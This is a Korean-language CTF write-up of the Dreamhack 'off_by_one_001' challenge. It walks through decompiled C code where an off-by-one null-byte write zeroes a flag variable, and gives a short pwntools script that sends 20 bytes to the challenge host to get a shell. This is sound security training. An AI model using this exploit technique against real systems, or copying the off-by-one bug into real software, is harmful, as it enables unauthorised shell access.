[Dreamhack] off_by_one_001

🔍  코드 분석

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char v4[20]; // [esp+0h] [ebp-18h] BYREF
  int v5; // [esp+14h] [ebp-4h]

  v5 = 1;
  initialize();
  printf("Name: ");
  read_str(v4, 20);
  printf("Are you baby?");
  if ( v5 )
  {
    puts("Ok, chance: ");
    read(0, v4, 20);
  }
  else
  {
    get_shell();
  }
  return 0;
}

|v4(0x18)|v5(0x4)|SFP|RET|

v5이 0이면 get_shell 함수 실행되어서 쉘 얻을 수 있음.

근데 v5=1로 설정되어 있기 때문에 이걸 조작해야 함

int __cdecl read_str(int a1, int a2)
{
  int result; // eax
  int v3; // [esp+0h] [ebp-4h]

  v3 = read(0, a1, a2);
  printf("%d", v3);
  result = v3 + a1;
  *(_BYTE *)(v3 + a1) = 0;
  return result;
}

 

v3 = read(0, v4, 20) ⇒ read() 함수는 성공 시 수신한 바이트수(20), 실패 시 -1

|result(0x4)|v3(0x4)|SFP|RET|

result = v3 + a1; (v4주소+20) ⇒ main함수에서 v5 변수 위치이다.

*(BYTE *)(v3 + a1) = 0; ⇒ v5 위치에 0 넣음 ⇒ 이후 if(v5)에서 v5가 0이 되어 쉘 얻을 수 있음

따라서 별다른 조작 없이 처음 입력 시 20바이트 입력하면 v5 값이 0으로 설정되어 쉘 실행할 수 있다.

쉘 실행하고 cat flag로 플래그 얻을 수 있다.

 

📝 익스플로잇 코드

#!/usr/bin/python3
from pwn import *

p = remote('host3.dreamhack.games', 23831)

payload = 'A'*(0x18-0x4)

p.sendafter(b'Name: ', payload)

p.interactive()